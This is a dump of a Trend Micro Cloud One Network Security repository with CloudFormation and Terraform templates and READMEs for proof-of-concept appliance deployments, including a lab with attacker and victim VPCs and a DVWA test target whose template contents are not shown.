├── CODEOWNERS ├── east-west-deployment ├── docs │ └── east-west.png ├── README.md └── templates │ ├── BaseSite.yaml │ ├── dvwa.yaml │ └── Master.yaml ├── edge-deployment ├── docs │ ├── edge_deployment.png │ └── edge_deployment.drawio ├── templates │ ├── elasticache.template │ ├── dvwa.template │ ├── rdsaurora.template │ └── securitygroups.template └── README.md ├── demo_terraform ├── docs │ └── Azure_Terraform_Demo.png ├── README.md ├── azure-user-data.sh ├── provider.tf ├── variables.tf ├── outputs.tf ├── webserver.tf └── network.tf ├── centralized-with-gwlb ├── docs │ └── centralized-with-gwlb.png ├── templates │ ├── AddALB.yaml │ ├── RemoveRecord.yaml │ ├── dvwa.yaml │ ├── BaseSite.yaml │ ├── splunk.yaml │ ├── last.yaml │ └── Master.yaml └── README.md ├── .gitmodules ├── README.md ├── .gitignore └── LICENSE.txt /CODEOWNERS: -------------------------------------------------------------------------------- 1 | * @ahsankbhai 2 | -------------------------------------------------------------------------------- /east-west-deployment/docs/east-west.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trendmicro/cloudone-network-security-deployments/main/east-west-deployment/docs/east-west.png -------------------------------------------------------------------------------- /edge-deployment/docs/edge_deployment.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trendmicro/cloudone-network-security-deployments/main/edge-deployment/docs/edge_deployment.png -------------------------------------------------------------------------------- /demo_terraform/docs/Azure_Terraform_Demo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trendmicro/cloudone-network-security-deployments/main/demo_terraform/docs/Azure_Terraform_Demo.png -------------------------------------------------------------------------------- /centralized-with-gwlb/docs/centralized-with-gwlb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trendmicro/cloudone-network-security-deployments/main/centralized-with-gwlb/docs/centralized-with-gwlb.png -------------------------------------------------------------------------------- /demo_terraform/README.md: -------------------------------------------------------------------------------- 1 | # demo_terraform 2 | Terraform IaC for Azure NSVA deployment demo 3 | 4 | 5 | -------------------------------------------------------------------------------- /demo_terraform/azure-user-data.sh: -------------------------------------------------------------------------------- 1 | #! /bin/bash 2 | sudo apt-get update 3 | sudo apt-get install -y apache2 4 | sudo systemctl start apache2 5 | sudo systemctl enable apache2 6 | echo "

Demo Apache Web Server

" | sudo tee /var/www/html/index.html -------------------------------------------------------------------------------- /demo_terraform/provider.tf: -------------------------------------------------------------------------------- 1 | # main.tf 2 | 3 | terraform { 4 | required_providers { 5 | azurerm = { 6 | source = "hashicorp/azurerm" 7 | version = "=2.73.0" 8 | } 9 | } 10 | } 11 | 12 | # Azure Creds 13 | provider "azurerm" { 14 | features {} 15 | subscription_id = var.sub_id 16 | client_id = var.client_id 17 | client_secret = var.client_secret 18 | tenant_id = var.tenant_id 19 | } -------------------------------------------------------------------------------- /.gitmodules: -------------------------------------------------------------------------------- 1 | [submodule "edge-deployment/submodules/quickstart-aws-acm-certificate"] 2 | path = edge-deployment/submodules/quickstart-aws-acm-certificate 3 | url = git@github.com:aws-quickstart/quickstart-aws-acm-certificate.git 4 | [submodule "edge-deployment/submodules/quickstart-aws-vpc"] 5 | path = edge-deployment/submodules/quickstart-aws-vpc 6 | url = git@github.com:aws-quickstart/quickstart-aws-vpc.git 7 | [submodule "edge-deployment/submodules/quickstart-linux-bastion"] 8 | path = edge-deployment/submodules/quickstart-linux-bastion 9 | url = git@github.com:aws-quickstart/quickstart-linux-bastion.git 10 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Trend Micro Cloud One™ – Network Security Deployments 2 | 3 | This repository is intended for Network Security customers. It contains scripts and AWS CloudFormation and Azure Terraform templates for various deployment types that customer could leverage for PoC purposes. 4 | 5 | Below are 4 deployments that this repository currently supports: 6 | 1. [Edge Deployment](edge-deployment/README.md) 7 | 2. [Centralized Deployment with Gateway Load Balancer](centralized-with-gwlb/README.md) 8 | 3. [East West Deployment](east-west-deployment/README.md) 9 | 4. [Azure Terraform Demo Deployment](demo_terraform/README.md) 10 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Local .terraform directories 2 | **/.terraform/* 3 | 4 | # .tfstate files 5 | *.tfstate 6 | *.tfstate.* 7 | 8 | # Crash log files 9 | crash.log 10 | crash.*.log 11 | 12 | # Exclude all .tfvars files, which are likely to contain sensitive data, such as 13 | # password, private keys, and other secrets. These should not be part of version 14 | # control as they are data points which are potentially sensitive and subject 15 | # to change depending on the environment. 16 | *.tfvars 17 | *.tfvars.json 18 | 19 | # Ignore override files as they are usually used to override resources locally and so 20 | # are not checked in 21 | override.tf 22 | override.tf.json 23 | *_override.tf 24 | *_override.tf.json 25 | 26 | # Include override files you do wish to add to version control using negated pattern 27 | # !example_override.tf 28 | 29 | # Include tfplan files to ignore the plan output of command: terraform plan -out=tfplan 30 | # example: *tfplan* 31 | 32 | # Ignore CLI configuration files 33 | .terraformrc 34 | terraform.rc -------------------------------------------------------------------------------- /demo_terraform/variables.tf: -------------------------------------------------------------------------------- 1 | # variables.tf 2 | 3 | variable "prefix" { 4 | description = "Prefix for resources" 5 | default = "" 6 | } 7 | variable "location" { 8 | description = "Region to deploy resources" 9 | default = "" 10 | } 11 | 12 | /* variable "boot_diagnostics_sa_type" { 13 | description = "Storage account type for boot diagnostics" 14 | default = "Standard_LRS" 15 | } */ 16 | 17 | variable "demoenv" { 18 | description = "Demo Environment" 19 | default = "" 20 | } 21 | 22 | variable "sub_id" { 23 | description = "Subscription_ID" 24 | default = "" 25 | } 26 | 27 | variable "client_id" { 28 | description = "Client_ID" 29 | default = "" 30 | } 31 | 32 | variable "client_secret" { 33 | description = "Client_Secret" 34 | default = "" 35 | } 36 | 37 | variable "tenant_id" { 38 | description = "Tenant_ID" 39 | default = "" 40 | } 41 | 42 | variable "admin_username" { 43 | description = "Admin Username Webserver" 44 | default = "" 45 | } 46 | 47 | variable "admin_password" { 48 | description = "Admin Password Webserver" 49 | default = "" 50 | } 51 | -------------------------------------------------------------------------------- /demo_terraform/outputs.tf: -------------------------------------------------------------------------------- 1 | # outputs.tf 2 | 3 | # Azure Resource Group 4 | output "Resource-Group" { 5 | value = azurerm_resource_group.demo-rg.name 6 | } 7 | 8 | # Azure inspection-vnet 9 | output "inspection-vnet-Name" { 10 | value = azurerm_virtual_network.inspection-vnet.name 11 | } 12 | output "inspection-vnet-Address" { 13 | value = azurerm_virtual_network.inspection-vnet.address_space 14 | } 15 | 16 | # Azure Management Subnet 17 | output "Subnet-Management" { 18 | value = azurerm_subnet.management-subnet.name 19 | } 20 | output "Subnet-Management-Address" { 21 | value = azurerm_subnet.management-subnet.address_prefixes 22 | } 23 | 24 | # Azure Inspection Subnet 25 | output "Subnet-inspection" { 26 | value = azurerm_subnet.inspection-subnet.name 27 | } 28 | output "Subnet-inspection-Address" { 29 | value = azurerm_subnet.inspection-subnet.address_prefixes 30 | } 31 | 32 | # Azure Sanitized Subnet 33 | output "Subnet-Sanitized-Name" { 34 | value = azurerm_subnet.sanitized-subnet.name 35 | } 36 | output "Subnet-Sanitized-Address" { 37 | value = azurerm_subnet.sanitized-subnet.address_prefixes 38 | } 39 | 40 | # Azure Load Balancer Subnet 41 | output "Subnet-loadbalancer-Name" { 42 | value = azurerm_subnet.loadbalancer-subnet.name 43 | } 44 | output "Subnet-loadbalancer-Address" { 45 | value = azurerm_subnet.loadbalancer-subnet.address_prefixes 46 | } 47 | 48 | # Azure Firewall 49 | output "Azure-Firewall" { 50 | value = azurerm_firewall.azure-firewall.name 51 | } 52 | output "Azure-Firewall-PIP" { 53 | value = azurerm_public_ip.azure-firewall-PublicIP.ip_address 54 | } 55 | 56 | # Log Analytics - Workspace ID and Primary Key 57 | output "Log-Analytics-Workspace-ID" { 58 | value = azurerm_log_analytics_workspace.log-analytics-workspace.workspace_id 59 | } 60 | output "Log-Analytics-Primary-Key" { 61 | value = azurerm_log_analytics_workspace.log-analytics-workspace.primary_shared_key 62 | sensitive = true 63 | } 64 | 65 | # Webserver IP Address 66 | output "Webserver-IP-Address" { 67 | value = azurerm_linux_virtual_machine.webserver.private_ip_address 68 | } 69 | 70 | # Storage Account ID 71 | output "Storage-Account-ID" { 72 | value = azurerm_storage_account.mystorageaccount.name 73 | } -------------------------------------------------------------------------------- /centralized-with-gwlb/templates/AddALB.yaml: -------------------------------------------------------------------------------- 1 | AWSTemplateFormatVersion: 2010-09-09 2 | 3 | Parameters: 4 | # ------------------------------------------------------------# 5 | # Import Master.yaml template 6 | # ------------------------------------------------------------# 7 | DomainName: 8 | Description: Enter the domain name to be used for the website 9 | Type: String 10 | SubDomain: 11 | Description: Enter the subdomain to be used for the ALB 12 | Type: String 13 | HostZoneID: 14 | Description: Enter the ID of the HostZone where the domain you want to use is registered 15 | Type: String 16 | # ------------------------------------------------------------# 17 | # Import BaseSite stack(BaseSite.yaml file) 18 | # ------------------------------------------------------------# 19 | TargetGroupID: 20 | Description: Target group ID of ALB 21 | Type: String 22 | ALBID: 23 | Description: ID of ALB 24 | Type: String 25 | HostedZoneId: 26 | Description: Hosted Zone ID of ALB 27 | Type: String 28 | DNSName: 29 | Description: DNS Name of ALB 30 | Type: String 31 | 32 | Resources: 33 | # ------------------------------------------------------------# 34 | # resource to make your website HTTPS, Create HTTPS Listener, ACM and Route53 record 35 | # ------------------------------------------------------------# 36 | ALBListenerHTTPS: 37 | Type: AWS::ElasticLoadBalancingV2::Listener 38 | Properties: 39 | Port: 443 40 | Protocol: HTTPS 41 | Certificates: 42 | - CertificateArn: !Ref ACM 43 | DefaultActions: 44 | - TargetGroupArn: !Ref TargetGroupID 45 | Type: forward 46 | LoadBalancerArn: !Ref ALBID 47 | ACM: 48 | Type: AWS::CertificateManager::Certificate 49 | Properties: 50 | DomainName: !Sub ${SubDomain}.${DomainName} 51 | DomainValidationOptions: 52 | - DomainName: !Sub ${SubDomain}.${DomainName} 53 | HostedZoneId: !Ref HostZoneID 54 | ValidationMethod: DNS 55 | DnsRecord: 56 | Type: AWS::Route53::RecordSet 57 | Properties: 58 | HostedZoneId: !Ref HostZoneID 59 | Comment: DNS for ALB 60 | Name: !Sub ${SubDomain}.${DomainName} 61 | Type: A 62 | AliasTarget: 63 | HostedZoneId: !Ref HostedZoneId 64 | DNSName: !Ref DNSName 65 | 66 | Outputs: 67 | HTTPSWebSiteURL: 68 | Value: !Sub https://${SubDomain}.${DomainName} 69 | Description: URL to access the web server (HTTPS) -------------------------------------------------------------------------------- /east-west-deployment/README.md: -------------------------------------------------------------------------------- 1 | # east-west-deployment 2 | ## Purpose and Objectives 3 | 4 | This Quick Start deploys attacker, victim and security VPC to demonstrate outbound protection with Network Security Appliance. It also deploys Damn Vulnerable Web Application (DVWA) in one of the public subnets on victim VPC. The purpose of this quickstart is to provide users a sample environment where they can deploy Network Security Virtual Appliance for east-west/ lateral traffic between various workload VPCs using Transit Gateway. In this deployment, we use Gateway Load Balancer and Transit Gateway to route traffic to Network Security Appliance. 5 | 6 | After deploying this Quick Start, you will be able to: 7 | 8 | - Deploy Network Security Virtual Appliance (NSVA) as [East-West Outbound Protection](https://cloudone.trendmicro.com/docs/network-security/GWLB_CFdeploy2/) 9 | - Configure your security profile in Network Security console by distributing various Intrustion Prevention (IPS), Geo Filters to prevent your resources from outbound attacks. 10 | - Perform various inbound and outbound attacks to validate protection. 11 | - Access logs of Network Security Virtual Applicance (NSVA) to verify which filters are getting triggered. 12 | ## Network Architecture 13 | 14 | 15 | 16 | ## Deployment Steps 17 | 18 | *Note: You can deploy this Quick Start using the default S3 template link below if you don't wish to make changes to this code and deploy with your own customized changes:* 19 | 20 | `https://quickstart-network-security.s3.us-west-1.amazonaws.com/east-west-deployment/templates/Master.yaml` 21 | ### 1. Deploy Network Security East West Outbound Only Inspection 22 | The Quick Start deploys Security VPC for East West Outbound Only inspection in multiple AZs using Transit Gateways. Users are expected to deploy attacker and victim VPCs manually (instructions are given below) 23 | 24 | Following are pre-requisites that must be fulfilled before you could deploy the Quick Start: 25 | - Create a new SSH key pair in the AWS region you will be deploying the Quick Start 26 | - [Generate a CloudOne API Key](https://cloudone.trendmicro.com/docs/network-security/add_cloud_accounts_appliances/#generate-an-api-key) 27 | 28 | Below are the parameters for Quick Start: 29 | #### Quick Start Parameters 30 | ##### Required parameters 31 | | Parameter label (name) | Default | Description | 32 | | :----------------------| :------------- | :------------------------------------------------------------- | 33 | | AllowIP | 127.0.0.1/32 | Only the IP entered here will be able to access the web server | 34 | | BucketName | quickstart-network-security | Name of the bucket where the template is placed | 35 | | BucketPrefix | centralized-with-gwlb/ | Bucket prefix | 36 | | BucketRegion | us-west-1| Bucket region | 37 | | DVWAInstanceType | t3.micro | Amazon EC2 instance type for the DVWA instances | 38 | | sshKeyPairName | None| [Required: 'DeployC1NS' must be set to true] SSH Key of the EC2 you are using | 39 | | SSMAccess | true | If enabled, SSM access to the instance will be available | 40 | | DeployC1NS | true | If enabled, C1NS with be deployed in centralized Security VPC | 41 | 42 | ##### If you set the DeployC1NS parameter to true, the following parameters are required 43 | | Parameter label (name) | Default | Description | 44 | | :----------------------| :------------- | :------------------------------------------------------------- | 45 | | CloudOneAPIKEY | None | CloudOne API key you want to use | 46 | | InstanceType | c5n.2xlarge | Instance type of NSVA | 47 | | SecurityVPCCIDR | 10.10.10.0/16 | CIDR of the VPC where you want to deploy the NSVA | 48 | | NsvaCountPerAz | 1 | Number of NSVA instances to be deployed in the AZ | 49 | | EnableInspectionLogs | false | If enabled, NSVA Inspection Logs will be published to CloudWatch log group "network_security_logs" | -------------------------------------------------------------------------------- /east-west-deployment/templates/BaseSite.yaml: -------------------------------------------------------------------------------- 1 | AWSTemplateFormatVersion: 2010-09-09 2 | 3 | Parameters: 4 | # ------------------------------------------------------------# 5 | # Import Master.yaml template 6 | # ------------------------------------------------------------# 7 | ImageId: 8 | Description: Enter the AMI ID of the EC2 instance. 9 | Type: String 10 | AllowIP: 11 | Description: Enter the global IP of the terminal to be tested 12 | Type: String 13 | NeedSSMAccess: 14 | Description: If enabled, SSM access to the instance will be available 15 | Type: String 16 | AllowedValues: [true, false] 17 | # ------------------------------------------------------------# 18 | # Import BaseVPC stack(aws-vpc.template.yaml file) 19 | # ------------------------------------------------------------# 20 | VPCId: 21 | Description: Enter the VPC ID where you want to deploy the EC2 instance. 22 | Type: String 23 | PrivateSubnet1ID: 24 | Description: Enter the Private Subnet ID where you want to deploy the EC2 instance. 25 | Type: String 26 | WebServerIngressAllowCIDR: 27 | Description: CIDR from where webserver should be accessible 28 | Type: String 29 | 30 | # ------------------------------------------------------------# 31 | # Conditions 32 | # ------------------------------------------------------------# 33 | Conditions: 34 | NeedSSM: 35 | !Equals [true, !Ref NeedSSMAccess] 36 | 37 | Resources: 38 | # ------------------------------------------------------------# 39 | # Resources for when you need SSM Access, Create IAM Role and Instance Profile 40 | # ------------------------------------------------------------# 41 | EC2Role: 42 | Condition: NeedSSM 43 | Type: AWS::IAM::Role 44 | Properties: 45 | Path: / 46 | RoleName: !Sub ${AWS::StackName}-EC2Role 47 | AssumeRolePolicyDocument: 48 | Version: 2012-10-17 49 | Statement: 50 | - Effect: Allow 51 | Principal: 52 | Service: 53 | - ec2.amazonaws.com 54 | Action: 55 | - sts:AssumeRole 56 | MaxSessionDuration: 3600 57 | ManagedPolicyArns: 58 | - arn:aws:iam::aws:policy/service-role/AmazonEC2RoleforSSM 59 | 60 | InstanceProfile: 61 | Condition: NeedSSM 62 | Type: AWS::IAM::InstanceProfile 63 | Properties: 64 | Path: / 65 | Roles: 66 | - !Ref EC2Role 67 | 68 | # ------------------------------------------------------------# 69 | # Create EC2 Instance 70 | # ------------------------------------------------------------# 71 | EC2Instance: 72 | Type: AWS::EC2::Instance 73 | Properties: 74 | ImageId: !Ref ImageId 75 | InstanceType: t2.micro 76 | SecurityGroupIds: 77 | - !Ref EC2SecurityGroup 78 | IamInstanceProfile: !If 79 | - NeedSSM 80 | - !Ref InstanceProfile 81 | - !Ref AWS::NoValue 82 | SubnetId: !Ref PrivateSubnet1ID 83 | Tags: 84 | - Key: Name 85 | Value: !Sub ${AWS::StackName}-WebServer 86 | UserData: 87 | !Base64 | 88 | #!/bin/bash 89 | amazon-linux-extras install nginx1.12 -y 90 | systemctl start nginx 91 | systemctl enable nginx 92 | 93 | # ------------------------------------------------------------# 94 | # Create 2 Security Group for EC2 Instance 95 | # ------------------------------------------------------------# 96 | EC2SecurityGroup: 97 | Type: AWS::EC2::SecurityGroup 98 | Properties: 99 | GroupName: !Sub ${AWS::StackName}-EC2-SG 100 | GroupDescription: Used for Web Server 101 | VpcId: !Ref VPCId 102 | SecurityGroupIngress: 103 | - 104 | IpProtocol: tcp 105 | FromPort: 80 106 | ToPort: 80 107 | CidrIp: !Ref WebServerIngressAllowCIDR 108 | Tags: 109 | - Key: Name 110 | Value: !Sub ${AWS::StackName}-EC2-SG 111 | 112 | Outputs: 113 | WebServerIP: 114 | Description: Webserver IP 115 | Value: !GetAtt EC2Instance.PrivateIp 116 | InstanceProfile: 117 | Condition: NeedSSM 118 | Value: !Ref InstanceProfile 119 | Description: Instance profile to be used for SSM access -------------------------------------------------------------------------------- /demo_terraform/webserver.tf: -------------------------------------------------------------------------------- 1 | # webserver.tf 2 | 3 | # Create public IP 4 | /* resource "azurerm_public_ip" "pubip" { 5 | name = "myPublicIP" 6 | location = var.location 7 | resource_group_name = azurerm_resource_group.demo-rg.name 8 | allocation_method = "Static" 9 | } */ 10 | 11 | resource "azurerm_network_interface" "webserver-nic" { 12 | name = "webserver-nic" 13 | location = var.location 14 | resource_group_name = azurerm_resource_group.demo-rg.name 15 | 16 | ip_configuration { 17 | name = "vm-ip-config" 18 | subnet_id = azurerm_subnet.workload-subnet.id 19 | private_ip_address_allocation = "Dynamic" 20 | } 21 | 22 | tags = { 23 | environment = var.demoenv 24 | } 25 | } 26 | 27 | /* resource "azurerm_marketplace_agreement" "apacheplan-1" { 28 | publisher = "cognosys" 29 | offer = "apache-web-server-with-centos-77-free" 30 | plan = "hourly" 31 | } */ 32 | 33 | # Create Web Server 34 | resource "azurerm_linux_virtual_machine" "webserver" { 35 | name = "webserver" 36 | location = var.location 37 | resource_group_name = azurerm_resource_group.demo-rg.name 38 | network_interface_ids = [azurerm_network_interface.webserver-nic.id] 39 | disable_password_authentication = false 40 | size = "Standard_D2s_v4" 41 | admin_username = var.admin_username 42 | admin_password = var.admin_password 43 | /* user_data = <Demo Apache Web Server" | sudo tee /var/www/html/index.html 50 | EOF */ 51 | 52 | plan { 53 | publisher = "cognosys" 54 | product = "apache-web-server-with-centos-77-free" 55 | name = "apache-web-server-with-centos-77-free" 56 | } 57 | 58 | provisioner "local-exec" { 59 | command = "az vm image terms accept --urn cognosys:apache-web-server-with-centos-77-free:apache-web-server-with-centos-77-free:1.2019.1009" 60 | } 61 | 62 | # Run this command in the Subscription that the Webserver will be deplyed from the Azure Cloud Shell 63 | # az vm image terms accept --urn cognosys:apache-web-server-with-centos-77-free:apache-web-server-with-centos-77-free:1.2019.1009 64 | 65 | source_image_reference { 66 | /* publisher = "Canonical" 67 | offer = "UbuntuServer" 68 | sku = "18.04-LTS" 69 | version = "latest" */ 70 | publisher = "cognosys" 71 | offer = "apache-web-server-with-centos-77-free" 72 | sku = "apache-web-server-with-centos-77-free" 73 | version = "1.2019.1009" 74 | } 75 | 76 | os_disk { 77 | name = "webserver-osdisk" 78 | caching = "ReadWrite" 79 | storage_account_type = "Standard_LRS" 80 | } 81 | 82 | /* # Copies the azure-user-data.sh file to /var/tmp/ 83 | provisioner "file" { 84 | source = "./azure-user-data.sh" 85 | destination = "/var/tmp/" 86 | } */ 87 | 88 | tags = { 89 | environment = var.demoenv 90 | } 91 | } 92 | 93 | # Create Network security group 94 | resource "azurerm_network_security_group" "vm-sg" { 95 | name = "${var.prefix}-sg" 96 | location = var.location 97 | resource_group_name = azurerm_resource_group.demo-rg.name 98 | 99 | security_rule { 100 | name = "All" 101 | priority = 100 102 | direction = "Inbound" 103 | access = "Allow" 104 | protocol = "Tcp" 105 | source_port_range = "*" 106 | destination_port_range = "*" 107 | source_address_prefix = "70.121.85.105/32" 108 | destination_address_prefix = "*" 109 | } 110 | } 111 | 112 | # Connect the security group to the network interface 113 | resource "azurerm_network_interface_security_group_association" "vm1_nsg_assoc" { 114 | network_interface_id = azurerm_network_interface.webserver-nic.id 115 | network_security_group_id = azurerm_network_security_group.vm-sg.id 116 | } 117 | 118 | # Generate random text for a unique storage account name 119 | resource "random_id" "randomId" { 120 | keepers = { 121 | # Generate a new ID only when a new resource group is defined 122 | resource_group = "${var.prefix}-sg" 123 | } 124 | 125 | byte_length = 8 126 | } 127 | 128 | # Create storage account for boot diagnostics 129 | resource "azurerm_storage_account" "mystorageaccount" { 130 | name = "diag${random_id.randomId.hex}" 131 | resource_group_name = azurerm_resource_group.demo-rg.name 132 | location = var.location 133 | account_tier = "Standard" 134 | account_replication_type = "LRS" 135 | 136 | tags = { 137 | environment = var.demoenv 138 | } 139 | } -------------------------------------------------------------------------------- /centralized-with-gwlb/templates/RemoveRecord.yaml: -------------------------------------------------------------------------------- 1 | AWSTemplateFormatVersion: 2010-09-09 2 | 3 | Parameters: 4 | # ------------------------------------------------------------# 5 | # Import Master.yaml template 6 | # ------------------------------------------------------------# 7 | HostZoneID: 8 | Description: Enter the ID of the HostZone where the domain you want to use is registered 9 | Type: String 10 | 11 | Resources: 12 | RemoveRecordLambdaRole: 13 | Type: AWS::IAM::Role 14 | Properties: 15 | Path: / 16 | RoleName: 17 | Fn::Join: 18 | - "" 19 | - - Fn::Select: 20 | - 2 21 | - Fn::Split: 22 | - "-" 23 | - !Ref AWS::StackName 24 | - "-RemoveRecordLambdaRole" 25 | AssumeRolePolicyDocument: 26 | Version: 2012-10-17 27 | Statement: 28 | - Effect: Allow 29 | Principal: 30 | Service: 31 | - lambda.amazonaws.com 32 | Action: 33 | - sts:AssumeRole 34 | MaxSessionDuration: 3600 35 | ManagedPolicyArns: 36 | - arn:aws:iam::aws:policy/service-role/AWSLambdaBasicExecutionRole 37 | - !Ref RemoveRecordLambdaPolicy 38 | 39 | RemoveRecordLambdaPolicy: 40 | Type: "AWS::IAM::ManagedPolicy" 41 | Properties: 42 | ManagedPolicyName: 43 | Fn::Join: 44 | - "" 45 | - - Fn::Select: 46 | - 2 47 | - Fn::Split: 48 | - "-" 49 | - !Ref AWS::StackName 50 | - "-RemoveRecordLambdaPolicy" 51 | Path: / 52 | PolicyDocument: 53 | Version: 2012-10-17 54 | Statement: 55 | - Action: 56 | - route53:ChangeResourceRecordSets 57 | - route53:ListResourceRecordSets 58 | Resource: "*" 59 | Effect: Allow 60 | 61 | RemoveRecordLambdaFunction: 62 | Type: AWS::Lambda::Function 63 | Properties: 64 | Code: 65 | ZipFile: | 66 | import json, boto3, logging 67 | import cfnresponse 68 | import os 69 | from datetime import datetime 70 | logger = logging.getLogger() 71 | logger.setLevel(logging.INFO) 72 | 73 | HostedZoneId = os.environ.get('HostedZoneId') 74 | client = boto3.client('route53') 75 | 76 | def lambda_handler(event, context): 77 | logger.info("event: {}".format(event)) 78 | try: 79 | if event['RequestType'] == 'Delete': 80 | response = client.list_resource_record_sets( 81 | HostedZoneId=HostedZoneId, 82 | ) 83 | for i in range(len(response['ResourceRecordSets'])): 84 | if "CNAME" == response['ResourceRecordSets'][i]['Type']: 85 | name = response['ResourceRecordSets'][i]['Name'] 86 | ttl = response['ResourceRecordSets'][i]['TTL'] 87 | value = response['ResourceRecordSets'][i]['ResourceRecords'][0]['Value'] 88 | client.change_resource_record_sets( 89 | HostedZoneId=HostedZoneId, 90 | ChangeBatch={ 91 | 'Changes': [ 92 | { 93 | 'Action': 'DELETE', 94 | 'ResourceRecordSet': { 95 | 'Name': name, 96 | 'Type': 'CNAME', 97 | 'TTL' : ttl, 98 | 'ResourceRecords': [ 99 | { 100 | 'Value': value 101 | }, 102 | ] 103 | } 104 | } 105 | ] 106 | } 107 | ) 108 | sendResponseCfn(event, context, cfnresponse.SUCCESS) 109 | except Exception as e: 110 | logger.info("Exception: {}".format(e)) 111 | sendResponseCfn(event, context, cfnresponse.FAILED) 112 | 113 | def sendResponseCfn(event, context, responseStatus): 114 | responseData = {} 115 | responseData['Data'] = {} 116 | cfnresponse.send(event, context, responseStatus, responseData, "CustomResourcePhysicalID") 117 | Role: !GetAtt RemoveRecordLambdaRole.Arn 118 | Environment: 119 | Variables: 120 | HostedZoneId: !Ref HostZoneID 121 | FunctionName: 122 | Fn::Join: 123 | - "" 124 | - - Fn::Select: 125 | - 3 126 | - Fn::Split: 127 | - "-" 128 | - !Ref AWS::StackName 129 | - "-RemoveRecord-Function" 130 | Handler: index.lambda_handler 131 | MemorySize: 128 132 | Runtime: python3.7 133 | Timeout: 300 134 | 135 | RemoveRecord: 136 | Type: AWS::CloudFormation::CustomResource 137 | Properties: 138 | ServiceToken: !GetAtt RemoveRecordLambdaFunction.Arn -------------------------------------------------------------------------------- /edge-deployment/templates/elasticache.template: -------------------------------------------------------------------------------- 1 | { 2 | "AWSTemplateFormatVersion": "2010-09-09", 3 | "Description": "WordPress ElastiCache - Memcached Cluster. (qs-1op312ie1)", 4 | "Parameters": { 5 | "Subnets": { 6 | "ConstraintDescription": "Must be a list of existing subnet Ids", 7 | "Description": "Atleast two existing Subnets in separate Availability Zones in your Virtual Private Cloud (VPC)", 8 | "Type": "List" 9 | }, 10 | "ElastiCacheSecurityGroup": { 11 | "Description": "A list of VPC security group IDs to be attached to the nodes in the cache cluster.", 12 | "Type": "List" 13 | }, 14 | "AutoMinorVersionUpgrade":{ 15 | "AllowedValues": [ 16 | "true", 17 | "false" 18 | ], 19 | "Default": "true", 20 | "Description": "Select true/false to setup Auto Minor Version upgrade", 21 | "Type": "String" 22 | }, 23 | "NodeType": { 24 | "AllowedValues": [ 25 | "cache.t2.micro", 26 | "cache.t2.small", 27 | "cache.t2.medium", 28 | "cache.t3.micro", 29 | "cache.t3.small", 30 | "cache.t3.medium", 31 | "cache.m3.medium", 32 | "cache.m3.large", 33 | "cache.m3.xlarge", 34 | "cache.m3.2xlarge", 35 | "cache.m4.large", 36 | "cache.m4.xlarge", 37 | "cache.m4.2xlarge", 38 | "cache.m4.4xlarge", 39 | "cache.m4.10xlarge", 40 | "cache.m5.large", 41 | "cache.m5.xlarge", 42 | "cache.m5.2xlarge", 43 | "cache.m5.4xlarge", 44 | "cache.m5.12xlarge", 45 | "cache.m5.24xlarge", 46 | "cache.r3.large", 47 | "cache.r3.xlarge", 48 | "cache.r3.2xlarge", 49 | "cache.r3.4xlarge", 50 | "cache.r3.8xlarge", 51 | "cache.r4.large", 52 | "cache.r4.xlarge", 53 | "cache.r4.2xlarge", 54 | "cache.r4.4xlarge", 55 | "cache.r4.8xlarge", 56 | "cache.r4.16xlarge", 57 | "cache.r5.large", 58 | "cache.r5.xlarge", 59 | "cache.r5.2xlarge", 60 | "cache.r5.4xlarge", 61 | "cache.r5.12xlarge", 62 | "cache.r5.24xlarge" 63 | ], 64 | "ConstraintDescription": "Must select a valid ElastiCache node type.", 65 | "Default": "cache.t3.medium", 66 | "Description": "The compute and memory capacity of nodes in a cache cluster. Please check that the selected instance type is available in your region.", 67 | "Type": "String" 68 | }, 69 | "NumberOfNode": { 70 | "Default": "2", 71 | "MinValue": "1", 72 | "MaxValue": "20", 73 | "Description": "The number of cache nodes that the cache cluster should have.", 74 | "Type": "Number" 75 | } 76 | }, 77 | "Resources":{ 78 | "ElastiCacheSubnetGroup":{ 79 | "Type" : "AWS::ElastiCache::SubnetGroup", 80 | "Properties" : { 81 | "Description": "Subnets available for the ElastiCache Memcached Instance", 82 | "SubnetIds":{ 83 | "Ref": "Subnets" 84 | } 85 | } 86 | }, 87 | "ElastiCacheCluster":{ 88 | "Type": "AWS::ElastiCache::CacheCluster", 89 | "Properties":{ 90 | "Engine": "memcached", 91 | "EngineVersion": "1.6.6", 92 | "CacheNodeType":{ 93 | "Ref": "NodeType" 94 | }, 95 | "NumCacheNodes": { 96 | "Ref": "NumberOfNode" 97 | }, 98 | "CacheSubnetGroupName":{ 99 | "Ref": "ElastiCacheSubnetGroup" 100 | }, 101 | "VpcSecurityGroupIds": { 102 | "Ref": "ElastiCacheSecurityGroup" 103 | }, 104 | "Tags":[ 105 | { 106 | "Key": "Name", 107 | "Value": "WordPress-ElastiCache-Cluster" 108 | } 109 | ] 110 | } 111 | } 112 | 113 | }, 114 | "Outputs":{ 115 | "ElastiCacheClusterId":{ 116 | "Description": "ElastiCache Cluster ID", 117 | "Value":{ 118 | "Ref": "ElastiCacheCluster" 119 | } 120 | }, 121 | "ElastiCacheClusterEndPoint":{ 122 | "Description": "ElastiCache Cluster Endpoint to connect", 123 | "Value": { 124 | "Fn::Join": [ 125 | "", 126 | [ 127 | { 128 | "Fn::GetAtt": ["ElastiCacheCluster", "ConfigurationEndpoint.Address"] 129 | }, 130 | ":", 131 | { 132 | "Fn::GetAtt": ["ElastiCacheCluster", "ConfigurationEndpoint.Port"] 133 | } 134 | ] 135 | ] 136 | } 137 | } 138 | } 139 | } 140 | -------------------------------------------------------------------------------- /edge-deployment/docs/edge_deployment.drawio: -------------------------------------------------------------------------------- 1 | 